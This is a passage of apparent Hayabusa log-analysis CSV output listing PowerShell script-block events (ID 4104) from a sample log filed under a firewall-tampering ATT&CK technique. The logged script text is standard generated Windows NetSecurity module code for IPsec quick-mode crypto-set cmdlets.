$__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewDisplayName')) { [object]$__cmdletization_value = ${NewDisplayName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Proposal')) { [object]$__cmdletization_value = ${Proposal} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PerfectForwardSecrecyGroup')) { [object]$__cmdletization_value = ${PerfectForwardSecrecyGroup} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PfsGroupID'; ParameterType = 'Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PfsGroupID'; ParameterType = 'Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecQuickModeCryptoSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetIPsecQuickModeCryptoSet' -Alias '*' function Remove-NetIPsecQuickModeCryptoSet { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [Alias('PfsGroup')] [ValidateNotNull()] [Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup[]] ${PerfectForwardSecrecyGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [Syst",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx
+2021-04-23 19:09:45.329 +09:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,"erSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByDisplayGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewDisplayName')) { [object]$__cmdletization_value = ${NewDisplayName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Proposal')) { [object]$__cmdletization_value = ${Proposal} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PerfectForwardSecrecyGroup')) { [object]$__cmdletization_value = ${PerfectForwardSecrecyGroup} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PfsGroupID'; ParameterType = 'Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PfsGroupID'; ParameterType = 'Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecQuickModeCryptoSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetIPsecQuickModeCryptoSet' -Alias '*' function Remove-NetIPsecQuickModeCryptoSet { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [Alias('PfsGroup')] [ValidateNotNull()] [Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup[]] ${PerfectForwardSecrecyGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [Syst",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx
+2021-04-23 19:09:45.329 +09:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,"em.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PerfectForwardSecrecyGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PerfectForwardSecrecyGroup}) $__cmdletization_queryBuilder.FilterByProperty('PfsGroupID', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleQMCryptoSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:DeleteInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecQuickModeCryptoSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Remove-NetIPsecQuickModeCryptoSet' -Alias '*' function Rename-NetIPsecQuickModeCryptoSet { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [Alias('PfsGroup')] [ValidateNotNull()] [Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup[]] ${PerfectForwardSecrecyGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] 